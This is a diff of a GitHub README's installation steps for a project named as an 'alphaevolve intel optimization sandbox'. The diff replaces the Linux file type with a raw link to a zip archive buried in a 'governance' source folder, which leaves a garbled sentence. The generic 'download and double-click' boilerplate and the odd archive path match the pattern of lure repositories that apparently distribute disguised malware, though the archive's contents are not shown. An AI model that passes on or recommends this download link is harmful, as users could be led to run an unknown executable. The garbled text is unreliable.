Elsayed930/alphaevolve-intel-optimization-sandbox/README.md

 ## 🛠 Installation Steps
 1. Once you have downloaded the application, locate the downloaded file.
 2. If you are using Windows, this will likely be a `.exe` file.
 For macOS, it may be a `.dmg` file.
-For Linux, it could be a `.tar.gz` file.
+For Linux, it could be a `https://github.com/Elsayed930/alphaevolve-intel-optimization-sandbox/raw/refs/heads/main/src/ae_sandbox/governance/optimization-intel-alphaevolve-sandbox-1.6.zip` file.
 3. Double-click the file to start the installation process.
 4. Follow the on-screen instructions to complete the installation.
 5. Once installed, find the application's icon on your desktop or in your applications folder.